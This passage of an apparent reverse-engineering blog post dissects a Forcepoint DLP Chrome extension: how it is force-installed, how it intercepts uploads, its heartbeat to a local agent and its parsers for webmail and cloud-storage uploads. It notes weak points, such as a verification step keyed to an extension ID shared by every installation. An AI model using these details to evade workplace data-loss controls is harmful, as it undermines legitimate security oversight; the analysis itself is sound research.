<span class="hljs-tag">&lt;<span class="hljs-name">string</span>&gt;</span>com.apple.ManagedClient.preferences<span class="hljs-tag">&lt;/<span class="hljs-name">string</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">key</span>&gt;</span>PayloadVersion<span class="hljs-tag">&lt;/<span class="hljs-name">key</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">integer</span>&gt;</span>1<span class="hljs-tag">&lt;/<span class="hljs-name">integer</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">key</span>&gt;</span>PayloadIdentifier<span class="hljs-tag">&lt;/<span class="hljs-name">key</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">string</span>&gt;</span>com.websense.WebsenseEndpointExtension.E503A43D-BE99-4D26-B9F4-8434364012F7<span class="hljs-tag">&lt;/<span class="hljs-name">string</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">key</span>&gt;</span>PayloadUUID<span class="hljs-tag">&lt;/<span class="hljs-name">key</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">string</span>&gt;</span>E503A43D-BE99-4D26-B9F4-8434364012F7<span class="hljs-tag">&lt;/<span class="hljs-name">string</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">key</span>&gt;</span>PayloadEnabled<span class="hljs-tag">&lt;/<span class="hljs-name">key</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">true</span> /&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">key</span>&gt;</span>PayloadDisplayName<span class="hljs-tag">&lt;/<span class="hljs-name">key</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">string</span>&gt;</span>Google Chrome<span class="hljs-tag">&lt;/<span class="hljs-name">string</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">key</span>&gt;</span>PayloadContent<span class="hljs-tag">&lt;/<span class="hljs-name">key</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">dict</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">key</span>&gt;</span>com.google.Chrome<span class="hljs-tag">&lt;/<span class="hljs-name">key</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">dict</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">key</span>&gt;</span>Forced<span class="hljs-tag">&lt;/<span class="hljs-name">key</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">array</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">dict</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">key</span>&gt;</span>mcx_preference_settings<span class="hljs-tag">&lt;/<span class="hljs-name">key</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">dict</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">key</span>&gt;</span>ExtensionInstallForcelist<span class="hljs-tag">&lt;/<span class="hljs-name">key</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">array</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">string</span>&gt;</span>ljckpacopljdanbdkdddedlackndojmf<span class="hljs-tag">&lt;/<span class="hljs-name">string</span>&gt;</span>
<span class="hljs-tag">&lt;/<span class="hljs-name">array</span>&gt;</span>
<span class="hljs-tag">&lt;/<span class="hljs-name">dict</span>&gt;</span>
<span class="hljs-tag">&lt;/<span class="hljs-name">dict</span>&gt;</span>
<span class="hljs-tag">&lt;/<span class="hljs-name">array</span>&gt;</span>
<span class="hljs-tag">&lt;/<span class="hljs-name">dict</span>&gt;</span>
<span class="hljs-tag">&lt;/<span class="hljs-name">dict</span>&gt;</span>
<span class="hljs-tag">&lt;/<span class="hljs-name">dict</span>&gt;</span>
<span class="hljs-tag">&lt;/<span class="hljs-name">array</span>&gt;</span>
<span class="hljs-tag">&lt;/<span class="hljs-name">dict</span>&gt;</span>
<span class="hljs-tag">&lt;/<span class="hljs-name">plist</span>&gt;</span>
</code></pre>
<p><code>WebsenseEndpointExtension.config</code> itself is then used to force the installation of the Chrome extension by leveraging the "Managed Client" feature in macOS. Specifically, it uses the <code>com.apple.ManagedClient.preferences</code> payload type to manage the preferences for the Google Chrome application. Within the Chrome preferences, it defines an "<code>ExtensionInstallForcelist</code>" array under the "<code>mcx_preference_settings</code>" key, which contains the extension ID "<code>ljckpacopljdanbdkdddedlackndojmf</code>".</p>
<p>When this configuration profile is deployed and applied to a macOS system, the Managed Client service interprets the forced preferences and instructs Google Chrome to install the specified extension ID from the Chrome Web Store, essentially bypassing the normal user-initiated installation process.</p>
<h1 id="heading-the-extension-itself">The Extension Itself</h1>
<p>The <code>ljckpacopljdanbdkdddedlackndojmf</code> extension is called “Forcepoint Endpoint”. It's around 36 KB and doesn't contain much. The main logic of the extension lives in the <code>background.js</code> file.</p>
<p>At the foundation of the interception system lies the primary request listener that captures all outgoing requests. The extension registers this listener using Chrome's webRequest API:</p>
<pre><code class="lang-javascript">chrome.webRequest.onBeforeRequest.addListener(<span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params">e</span>) </span>{
    <span class="hljs-keyword">return</span> <span class="hljs-string">"POST"</span> != e.method &amp;&amp; <span class="hljs-string">"PUT"</span> != e.method || (o[e.requestId] = e.requestBody), {
        <span class="hljs-attr">cancel</span>: <span class="hljs-literal">false</span>
    }
}, {
    <span class="hljs-attr">urls</span>: [<span class="hljs-string">"&lt;all_urls&gt;"</span>]
}, [<span class="hljs-string">"blocking"</span>, <span class="hljs-string">"requestBody"</span>]);
</code></pre>
<p>This listener focuses specifically on POST and PUT requests, which are typically used for file uploads and data submissions. When such a request is detected, the extension stores the request body in a temporary cache (the object <code>o</code>), keyed by request ID. The <code>&lt;all_urls&gt;</code> pattern means the listener fires for all web traffic, not just specific domains or protocols.</p>
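<p>The minified one-liner is easier to follow when expanded. A rough readable equivalent might look like the sketch below. The names <code>pendingBodies</code> and <code>rememberUploadBody</code> are my own and do not appear in the extension, and the registration call is left out so the function can be read on its own.</p>
<pre><code class="lang-javascript">// Readable sketch of the minified onBeforeRequest listener above.
// pendingBodies plays the role of the object "o"; all names are illustrative.
const pendingBodies = {};

function rememberUploadBody(details) {
    const isUpload = details.method === "POST" || details.method === "PUT";
    if (isUpload) {
        // requestBody is only populated because "requestBody" is passed
        // in the extra options array when the listener is registered.
        pendingBodies[details.requestId] = details.requestBody;
    }
    // The request is never blocked at this stage, only recorded.
    return { cancel: false };
}
</code></pre>
<p>Nothing is decided here: every request is allowed through, and the cached body is only picked up later, when the headers are about to be sent.</p>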
<p>The main interception logic occurs in the <code>onBeforeSendHeaders</code> listener. This component performs deep inspection of requests and determines whether they should be allowed or blocked:</p>
<pre><code class="lang-javascript">chrome.webRequest.onBeforeSendHeaders.addListener(<span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params">r</span>) </span>{
    <span class="hljs-keyword">if</span> (<span class="hljs-number">0</span> == O || <span class="hljs-string">"POST"</span> != r.method &amp;&amp; <span class="hljs-string">"PUT"</span> != r.method) <span class="hljs-keyword">return</span> {
        <span class="hljs-attr">cancel</span>: <span class="hljs-literal">false</span>
    };

    <span class="hljs-keyword">if</span> (<span class="hljs-literal">null</span> != r.url.match(<span class="hljs-regexp">/https?\:\/\/localhost\:55296\/ChromeExt\//i</span>) || 
        <span class="hljs-literal">null</span> != r.url.match(<span class="hljs-regexp">/mail\.google\.com\/cloudsearch/i</span>)) {
        <span class="hljs-keyword">return</span> { <span class="hljs-attr">cancel</span>: <span class="hljs-literal">false</span> }
    }

    <span class="hljs-comment">// [...]</span>
</code></pre>
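<p>The listener returns early when interception is disabled (the flag <code>O</code> is false) or when the request is not a POST or PUT, and it exempts requests to the extension's own local endpoint as well as Gmail's <code>cloudsearch</code> path. The extension also keeps its cache of request fingerprints (the object <code>D</code>) from growing without bound: the cleanup function below deletes entries older than 30 seconds (<code>3e4</code> ms), which keeps memory usage in check during long browsing sessions.</p>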
<pre><code class="lang-javascript"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">T</span>(<span class="hljs-params"></span>) </span>{
    <span class="hljs-keyword">var</span> e, t = (<span class="hljs-keyword">new</span> <span class="hljs-built_in">Date</span>).getTime();
    <span class="hljs-keyword">for</span> (e <span class="hljs-keyword">in</span> D) <span class="hljs-number">3e4</span> &lt; t - D[e] &amp;&amp; <span class="hljs-keyword">delete</span> D[e]
}
</code></pre>
<p>The extension also inspects request contents, focusing on file uploads and attachments. Two helpers from that path are shown below: <code>B</code> checks the request headers for <code>x-goog-upload-protocol</code>, which marks Google's upload protocol, and <code>x</code> extracts the <code>boundary</code> parameter that is needed to split multipart form data into its individual parts.</p>
<pre><code class="lang-javascript"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">B</span>(<span class="hljs-params">e</span>) </span>{
    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">var</span> t <span class="hljs-keyword">of</span> e)
        <span class="hljs-keyword">if</span> (<span class="hljs-string">"x-goog-upload-protocol"</span> == t.name.toLowerCase()) 
            <span class="hljs-keyword">return</span> <span class="hljs-literal">true</span>;
    <span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;
}

<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">x</span>(<span class="hljs-params">e</span>) </span>{
    <span class="hljs-keyword">var</span> t = <span class="hljs-string">"boundary="</span>,
        r = <span class="hljs-string">""</span>,
        n = e.search(t);
    <span class="hljs-keyword">return</span> <span class="hljs-number">-1</span> != n &amp;&amp; (n += t.length, <span class="hljs-string">'"'</span> == (r = <span class="hljs-number">-1</span> == (t = e.search(<span class="hljs-string">"\r\n"</span>)) ? 
           e.substr(n) : e.substr(n, t)).charAt(<span class="hljs-number">0</span>) &amp;&amp; 
           (r = r.slice(<span class="hljs-number">1</span>, r.length - <span class="hljs-number">1</span>))), r
}
</code></pre>
<p>The plugin communicates with a local server running on port 55296, which is part of the broader Forcepoint Websense DLP system. The helper <code>I</code> returns the HTTPS or HTTP base URL depending on the flag <code>l</code>.</p>
<pre><code class="lang-javascript"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">I</span>(<span class="hljs-params"></span>) </span>{
    <span class="hljs-keyword">return</span> l ? <span class="hljs-string">"https://localhost:55296/ChromeExt/"</span> : <span class="hljs-string">"http://localhost:55296/ChromeExt/"</span>
}
</code></pre>
<p>When the extension intercepts a request, it forwards relevant information to this local server. The extension includes detailed metadata about each request in custom headers, allowing the local server to make informed decisions about whether to allow or block the request.</p>
<pre><code class="lang-javascript"><span class="hljs-keyword">var</span> y = <span class="hljs-keyword">new</span> XMLHttpRequest;
y.open(<span class="hljs-string">"POST"</span>, I() + X, b);
y.setRequestHeader(<span class="hljs-string">"X-Email-Url"</span>, r.url);
y.setRequestHeader(<span class="hljs-string">"X-Status"</span>, r.statusCode);
y.setRequestHeader(<span class="hljs-string">"X-Referrer"</span>, r.originUrl);
y.setRequestHeader(<span class="hljs-string">"X-Initiator"</span>, r.initiator);
y.setRequestHeader(<span class="hljs-string">"X-Private"</span>, <span class="hljs-string">"false"</span>);
</code></pre>
<p>The extension pays special attention to webmail, particularly Gmail and Yahoo Mail, and includes specific URL patterns for both. When a POST to one of those patterns fails with <code>net::ERR_BLOCKED_BY_CLIENT</code>, the error Chrome reports when a request has been blocked by an extension, the extension reloads the active tab, presumably so the mail client recovers cleanly from the blocked attachment upload.</p>
<pre><code class="lang-javascript"><span class="hljs-keyword">var</span> H = <span class="hljs-string">"ALLOW"</span>,
    O = !<span class="hljs-number">1</span>,
    U = !<span class="hljs-number">1</span>,
    D = {},
    X = <span class="hljs-string">"12345678"</span>,
    o = {},
    e = [<span class="hljs-string">"https://mail.google.com/*"</span>, <span class="hljs-string">"https://mail.yahoo.com/*"</span>],
    r = [<span class="hljs-string">"mail\\.google\\.com\\/sync"</span>, <span class="hljs-string">"mail\\.yahoo\\.com\\/ws\\/v3\\/batch\\?name=messages"</span>],
    a = {},
    l = !<span class="hljs-number">0</span>;

<span class="hljs-comment">// [...]</span>

chrome.webRequest.onErrorOccurred.addListener(<span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params">t</span>) </span>{
    <span class="hljs-keyword">if</span> (<span class="hljs-keyword">void</span> <span class="hljs-number">0</span> !== t &amp;&amp; <span class="hljs-string">"POST"</span> == t.method &amp;&amp; 
        <span class="hljs-string">"net::ERR_BLOCKED_BY_CLIENT"</span> == t.error) {
        <span class="hljs-keyword">let</span> e = <span class="hljs-keyword">new</span> <span class="hljs-built_in">RegExp</span>(r.join(<span class="hljs-string">"|"</span>), <span class="hljs-string">"i"</span>);
        e.test(t.url) &amp;&amp; chrome.tabs.query({
            <span class="hljs-attr">active</span>: <span class="hljs-literal">true</span>,
            <span class="hljs-attr">currentWindow</span>: <span class="hljs-literal">true</span>
        }, <span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params">e</span>) </span>{
            chrome.tabs.reload(e[<span class="hljs-number">0</span>].id)
        })
    }
}, {
    <span class="hljs-attr">urls</span>: e
});
</code></pre>
<p>The content script component of the extension monitors file input elements on web pages, allowing it to detect when users attempt to upload files. This monitoring system uses <code>MutationObserver</code> to detect dynamically added file inputs, ensuring comprehensive coverage of all possible file upload attempts on a page.</p>
<pre><code class="lang-javascript"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">t</span>(<span class="hljs-params"></span>) </span>{
    <span class="hljs-keyword">var</span> e;
    <span class="hljs-keyword">for</span> (e <span class="hljs-keyword">of</span> <span class="hljs-built_in">document</span>.body.getElementsByTagName(<span class="hljs-string">"input"</span>)) 
        <span class="hljs-keyword">if</span> (<span class="hljs-string">"file"</span> === e.type &amp;&amp; <span class="hljs-keyword">void</span> <span class="hljs-number">0</span> === e._fp_processed) {
            e.addEventListener(<span class="hljs-string">"click"</span>, o, <span class="hljs-literal">true</span>);
            e._fp_processed = <span class="hljs-literal">true</span>;
        }
}

<span class="hljs-keyword">const</span> e = <span class="hljs-keyword">new</span> MutationObserver(<span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params">e</span>) </span>{
    t()
});
e.observe(<span class="hljs-built_in">document</span>.body, {
    <span class="hljs-attr">childList</span>: <span class="hljs-literal">true</span>,
    <span class="hljs-attr">subtree</span>: <span class="hljs-literal">true</span>
});
</code></pre>
<h2 id="heading-verifications">Verifications</h2>
<p>At the core of the extension's operation is a verification handshake with the local server, which ties the extension to the locally installed agent. The extension polls the server with a heartbeat request every 15 seconds, switching between HTTPS and HTTP when a request errors out, and maintains a state flag (<code>O</code>) that determines whether it is allowed to intercept traffic. A 200 response enables interception, a status of 0 or 500 disables it, and any other status leaves it enabled and is only logged. The request path is the extension ID (<code>chrome.runtime.id</code>), which identifies the extension to the local server. Note that this ID is the same for every installation from the Chrome Web Store, so it does not distinguish one installation from another.</p>
<pre><code class="lang-javascript"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">i</span>(<span class="hljs-params"></span>) </span>{
    <span class="hljs-keyword">var</span> t, e = <span class="hljs-keyword">new</span> XMLHttpRequest;
    e.onreadystatechange = <span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params"></span>) </span>{
        <span class="hljs-number">4</span> == e.readyState &amp;&amp; (<span class="hljs-number">200</span> == e.status ? 
            (U = <span class="hljs-string">"MOMOMO"</span> == e.responseText, O = !<span class="hljs-number">0</span>) : 
            <span class="hljs-number">0</span> == e.status || <span class="hljs-number">500</span> == e.status ? O = !<span class="hljs-number">1</span> : 
            (O = !<span class="hljs-number">0</span>, <span class="hljs-built_in">console</span>.log(<span class="hljs-string">"GET response ERROR code: "</span> + e.status)))
    };
    e.addEventListener(<span class="hljs-string">"error"</span>, <span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params">e</span>) </span>{
        l ? (l = !<span class="hljs-number">1</span>, i(), <span class="hljs-built_in">clearTimeout</span>(t)) : l = !<span class="hljs-number">0</span>
    });
    e.open(<span class="hljs-string">"GET"</span>, I() + chrome.runtime.id, !<span class="hljs-number">0</span>);
    e.send();
    t = <span class="hljs-built_in">setTimeout</span>(i, <span class="hljs-number">15e3</span>)
}
</code></pre>
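<p>The extension also implements a request tracking system that prevents duplicate uploads and keeps a short-lived record of recent requests. It uses MD5 hashing to fingerprint each request and stores the fingerprint in <code>D</code> together with the request timestamp. If the same fingerprint shows up again before the cleanup function <code>T</code> has expired it (after 30 seconds), the request is cancelled.</p>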
<pre><code class="lang-javascript"><span class="hljs-keyword">var</span> v = L(m += l + w);
T();
<span class="hljs-keyword">if</span> (v <span class="hljs-keyword">in</span> D) {
    <span class="hljs-keyword">return</span> { <span class="hljs-attr">cancel</span>: <span class="hljs-literal">true</span> };
}
D[v] = r.timeStamp;
</code></pre>
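<p>Read de-minified, the snippet appears to hash a string built from the request’s file names and body, then use the digest as a key into a table of requests it has already seen. Below is a minimal sketch of that idea, assuming Node’s built-in <code>crypto</code> module as a stand-in for the extension’s own MD5 routine (<code>L</code>). The names <code>fingerprint</code>, <code>seenRequests</code> and <code>checkDuplicate</code> are made up for illustration and do not appear in the extension.</p>
<pre><code class="lang-javascript">const crypto = require("crypto");

// Hypothetical stand-in for the minified table D: digest -> first-seen timestamp.
const seenRequests = {};

// Hypothetical stand-in for L(): MD5 over the concatenated request description.
function fingerprint(fileNames, bodyText) {
    return crypto.createHash("md5").update(fileNames + bodyText).digest("hex");
}

// Mirrors the "v in D" check: a repeated fingerprint is cancelled,
// a new one is recorded together with the request timestamp.
function checkDuplicate(fileNames, bodyText, timeStamp) {
    const key = fingerprint(fileNames, bodyText);
    if (key in seenRequests) {
        return { cancel: true };
    }
    seenRequests[key] = timeStamp;
    // Simplification: the real handler carries on with further checks here.
    return { cancel: false };
}
</code></pre>
<p>Calling <code>checkDuplicate</code> twice with the same file names and body records the first request and cancels the second, which is the behaviour the <code>v in D</code> check suggests.</p>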
<h2 id="heading-content-parsing">Content Parsing</h2>
<p>The extension performs content inspection, particularly focusing on file uploads and attachments. It implements dedicated parsers for different types of content, including multipart form data and service-specific upload protocols.</p>
<pre><code class="lang-javascript"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">x</span>(<span class="hljs-params">e</span>) </span>{
    <span class="hljs-keyword">var</span> t = <span class="hljs-string">"boundary="</span>,
        r = <span class="hljs-string">""</span>,
        n = e.search(t);
    <span class="hljs-keyword">if</span> (<span class="hljs-number">-1</span> != n) {
        n += t.length;
        r = <span class="hljs-number">-1</span> == (t = e.search(<span class="hljs-string">"\r\n"</span>)) ? 
            e.substr(n) : e.substr(n, t);
        <span class="hljs-keyword">if</span> (<span class="hljs-string">'"'</span> == r.charAt(<span class="hljs-number">0</span>)) {
            r = r.slice(<span class="hljs-number">1</span>, r.length - <span class="hljs-number">1</span>);
        }
    }
    <span class="hljs-keyword">return</span> r;
}
</code></pre>
<p>This boundary detection function is crucial for accurately parsing multipart form data, which is commonly used for file uploads. The extension uses this information to properly separate and analyze individual parts of the upload content.</p>
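<p>For readability, here is a de-minified sketch of the same boundary lookup. The name <code>extractBoundary</code> and the sample header values are illustrative assumptions. It uses <code>indexOf</code> and <code>slice</code> with explicit indices, whereas the minified original passes the position of the line break as the length argument of <code>substr</code>, which looks like it could read past the line break when one is present.</p>
<pre><code class="lang-javascript">// Hypothetical helper: pull the multipart boundary out of a Content-Type value.
function extractBoundary(contentType) {
    const marker = "boundary=";
    const start = contentType.indexOf(marker);
    if (start === -1) {
        return "";
    }
    let value = contentType.slice(start + marker.length);
    // Stop at the end of the header line, if there is one.
    const lineEnd = value.indexOf("\r\n");
    if (lineEnd !== -1) {
        value = value.slice(0, lineEnd);
    }
    // Like the original, assume a quoted boundary ends with a closing quote.
    if (value.charAt(0) === '"') {
        value = value.slice(1, value.length - 1);
    }
    return value;
}

console.log(extractBoundary("multipart/form-data; boundary=----demo123"));
console.log(extractBoundary('multipart/form-data; boundary="quoted-demo"'));
</code></pre>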
<p>The extension implements a comprehensive file upload control system that operates at multiple levels. At the DOM level, it monitors file input elements.</p>
<pre><code class="lang-javascript"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">t</span>(<span class="hljs-params"></span>) </span>{
    <span class="hljs-keyword">var</span> e;
    <span class="hljs-keyword">for</span> (e <span class="hljs-keyword">of</span> <span class="hljs-built_in">document</span>.body.getElementsByTagName(<span class="hljs-string">"input"</span>)) {
        <span class="hljs-keyword">if</span> (<span class="hljs-string">"file"</span> === e.type &amp;&amp; <span class="hljs-keyword">void</span> <span class="hljs-number">0</span> === e._fp_processed) {
            e.addEventListener(<span class="hljs-string">"click"</span>, o, !<span class="hljs-number">0</span>);
            e._fp_processed = !<span class="hljs-number">0</span>;
        }
    }
}

<span class="hljs-keyword">const</span> e = <span class="hljs-keyword">new</span> MutationObserver(<span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params">e</span>) </span>{
    t()
});
e.observe(<span class="hljs-built_in">document</span>.body, {
    <span class="hljs-attr">childList</span>: !<span class="hljs-number">0</span>,
    <span class="hljs-attr">subtree</span>: !<span class="hljs-number">0</span>
});
</code></pre>
<p>This creates a monitoring system that catches all file upload attempts, even on dynamically loaded content. When a file input is clicked, the extension notifies the background script.</p>
<pre><code class="lang-javascript"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">o</span>(<span class="hljs-params">e</span>) </span>{
    <span class="hljs-built_in">window</span>.addEventListener(<span class="hljs-string">"focus"</span>, n);
    chrome.runtime.sendMessage({
        <span class="hljs-attr">type</span>: <span class="hljs-string">"open_file_dialog"</span>
    });
}
</code></pre>
<p>The extension includes specialized handling for Microsoft OneDrive's upload protocol. This parser specifically looks for OneDrive's upload session creation endpoints. It decodes the URL and extracts the relevant path information. The function is designed to handle OneDrive's specific URL format where file paths are embedded within the URL structure.</p>
<pre><code class="lang-javascript"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">P</span>(<span class="hljs-params">e</span>) </span>{
    <span class="hljs-keyword">var</span> t = <span class="hljs-built_in">decodeURIComponent</span>(e),
        r = <span class="hljs-string">""</span>,
        n = t.lastIndexOf(<span class="hljs-string">":/oneDrive.createUploadSession"</span>);
    <span class="hljs-keyword">if</span> (<span class="hljs-number">-1</span> != n) {
        e = t.substr(<span class="hljs-number">0</span>, n).lastIndexOf(<span class="hljs-string">":/"</span>);
        <span class="hljs-keyword">if</span> (<span class="hljs-number">-1</span> != e) {
            r = t.slice(e += <span class="hljs-string">":/"</span>.length, n);
        }
    }
    <span class="hljs-keyword">return</span> r;
}
</code></pre>
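<p>To make the string slicing concrete, here is the same logic with descriptive names, run against a made-up URL. Both <code>extractOneDrivePath</code> and the <code>example.invalid</code> URL are assumptions for illustration, not values taken from the extension or from OneDrive traffic.</p>
<pre><code class="lang-javascript">// Hypothetical readable version of P(): return the path that sits between
// the last ":/" and the ":/oneDrive.createUploadSession" suffix.
function extractOneDrivePath(url) {
    const decoded = decodeURIComponent(url);
    const marker = ":/oneDrive.createUploadSession";
    const end = decoded.lastIndexOf(marker);
    if (end === -1) {
        return "";
    }
    const start = decoded.slice(0, end).lastIndexOf(":/");
    if (start === -1) {
        return "";
    }
    return decoded.slice(start + ":/".length, end);
}

// Made-up URL in the shape the parser expects.
const sampleUrl = "https://example.invalid/_api/v2.0/drive/root:/Reports/Q3%20plan.docx:/oneDrive.createUploadSession";
console.log(extractOneDrivePath(sampleUrl)); // prints "Reports/Q3 plan.docx"
</code></pre>
<p>The decoded path, including the file name, is what ends up being available for reporting, so the file name is known before any file content is inspected.</p>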
<p>The extension implements specialized parsing for Microsoft 365 SharePoint URLs and uploads. This parser handles SharePoint's specific URL encoding format. It first decodes the URL, then looks for specific patterns that indicate file operations. The parser is designed to extract the actual file path from SharePoint's complex URL structure.</p>
<pre><code class="lang-javascript"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">E</span>(<span class="hljs-params">e</span>) </span>{
    <span class="hljs-keyword">var</span> t = <span class="hljs-built_in">decodeURIComponent</span>(e),
        r = y(t);
    <span class="hljs-keyword">if</span> (<span class="hljs-string">""</span> == r) <span class="hljs-keyword">return</span> <span class="hljs-string">""</span>;

    e = t.indexOf(r += <span class="hljs-string">"='"</span>);
    <span class="hljs-keyword">if</span> (<span class="hljs-number">-1</span> == e) <span class="hljs-keyword">return</span> <span class="hljs-string">""</span>;

    e += r.length;
    r = t.substr(e).indexOf(<span class="hljs-string">"'"</span>);
    <span class="hljs-keyword">return</span> <span class="hljs-number">-1</span> == r ? t.substr(e) : t.substr(e, r)
}
</code></pre>
<p>The extension also includes special handling for Google Drive's upload protocol. Google Drive uses different upload protocols depending on the file size and type, with smaller files using a simple direct upload where the entire file is sent in a single request.</p>
<pre><code class="lang-javascript"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">B</span>(<span class="hljs-params">e</span>) </span>{
    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">var</span> t <span class="hljs-keyword">of</span> e)
        <span class="hljs-keyword">if</span> (<span class="hljs-string">"x-goog-upload-protocol"</span> == t.name.toLowerCase()) 
            <span class="hljs-keyword">return</span> <span class="hljs-literal">true</span>;
    <span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;
}
</code></pre>
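<p>The header list passed in here has the shape used by Chrome’s <code>webRequest</code> events: an array of objects with <code>name</code> and <code>value</code> fields. A small sketch of the same check with a descriptive name follows; <code>hasGoogleUploadHeader</code> and the sample headers are illustrative assumptions.</p>
<pre><code class="lang-javascript">// Hypothetical readable version of B(): true when any request header is
// named x-goog-upload-protocol, compared case-insensitively.
function hasGoogleUploadHeader(requestHeaders) {
    return requestHeaders.some(function (header) {
        return header.name.toLowerCase() === "x-goog-upload-protocol";
    });
}

// Sample header lists in the webRequest shape (values are made up).
const driveUpload = [
    { name: "Content-Type", value: "application/octet-stream" },
    { name: "X-Goog-Upload-Protocol", value: "resumable" }
];
const plainPut = [{ name: "Content-Type", value: "text/plain" }];

console.log(hasGoogleUploadHeader(driveUpload)); // prints true
console.log(hasGoogleUploadHeader(plainPut));    // prints false
</code></pre>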
<p>When multi-part uploads are detected, the extension applies specific processing rules. Multi-part connections happen when uploading multiple files simultaneously, when metadata needs to be sent along with the file content, when using the browser's FormData API for uploads, or when uploading through the Google Drive API's multipart endpoint.</p>
<pre><code class="lang-javascript"><span class="hljs-keyword">if</span> (<span class="hljs-string">"PUT"</span> == r.method &amp;&amp; <span class="hljs-number">0</span> == B(r.requestHeaders)) {
    S(r.requestId);
    <span class="hljs-keyword">return</span> { <span class="hljs-attr">cancel</span>: <span class="hljs-literal">false</span> };
}
</code></pre>
<p>The extension implements form data processing that handles both standard form fields and file uploads. The code walks every form field: values that look like file names are collected separately, while everything else is treated as content. Content is capped at 524288 characters (512 KiB) per value to prevent memory issues with large uploads, and it is formatted as multipart data with the boundary and <code>Content-Disposition</code> lines that HTTP expects.</p>
<pre><code class="lang-javascript"><span class="hljs-keyword">if</span> (c.formData &amp;&amp; <span class="hljs-literal">null</span> != c.formData) {
    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">var</span> R <span class="hljs-keyword">in</span> c.formData) {
        <span class="hljs-keyword">for</span> (<span class="hljs-keyword">let</span> e = <span class="hljs-number">0</span>; e &lt; c.formData[R].length; e++) {
            <span class="hljs-keyword">if</span> (<span class="hljs-literal">null</span> != c.formData[R][e]) {
                <span class="hljs-keyword">if</span> (<span class="hljs-literal">null</span> != c.formData[R][e].match(<span class="hljs-regexp">/^[\w\s-\.\)\(]+\.[\w]{1,5}$/</span>)) {
                    l += c.formData[R][e] + <span class="hljs-string">"\n"</span>;
                } <span class="hljs-keyword">else</span> {
                    <span class="hljs-keyword">if</span> (<span class="hljs-string">""</span> != i) {
                        s += <span class="hljs-string">"\r\n--"</span> + i;
                        s += <span class="hljs-string">"\r\nContent-Disposition: form-data; "</span>;
                        s += <span class="hljs-string">'name="'</span> + R + <span class="hljs-string">'"\r\n\r\n'</span>;
                    }
                    s += c.formData[R][e].substring(<span class="hljs-number">0</span>, 
                         <span class="hljs-built_in">Math</span>.min(<span class="hljs-number">524288</span>, c.formData[R][e].length));
                }
            }
        }
    }
}
</code></pre>
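<p>The file-name test and the size cap are the two decisions that matter in this loop. Here is a sketch of just those two, using hypothetical names (<code>FILE_NAME_PATTERN</code>, <code>MAX_FIELD_CHARS</code>, <code>classifyFormValue</code>) and the same character class as the extension’s regex, rewritten with an escaped hyphen.</p>
<pre><code class="lang-javascript">// Same idea as the extension's pattern: word characters, whitespace, "-", ".",
// "(" and ")" followed by a dot and a 1-5 character extension.
const FILE_NAME_PATTERN = /^[\w\s\-.)(]+\.\w{1,5}$/;
const MAX_FIELD_CHARS = 524288; // 512 * 1024

// Hypothetical helper: decide whether a form value is a file name or content.
function classifyFormValue(value) {
    if (FILE_NAME_PATTERN.test(value)) {
        return { kind: "fileName", text: value };
    }
    return { kind: "content", text: value.substring(0, Math.min(MAX_FIELD_CHARS, value.length)) };
}

console.log(classifyFormValue("report (final).pdf").kind); // prints "fileName"
console.log(classifyFormValue("hello world").kind);        // prints "content"
console.log(classifyFormValue("v1.2").kind);               // prints "fileName"
</code></pre>
<p>The last call shows that this is a heuristic: any short value that ends in a dot plus a few word characters is treated as a file name, whether or not a file is involved.</p>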
<p>For raw binary uploads, the extension implements specialized buffer handling. It uses <code>TypedArrays</code> and <code>ArrayBuffers</code> for binary data handling, crucial for processing large file uploads by combining multiple chunks into a single buffer when necessary.</p>
<pre><code class="lang-javascript"><span class="hljs-keyword">if</span> (<span class="hljs-literal">null</span> != c.raw) {
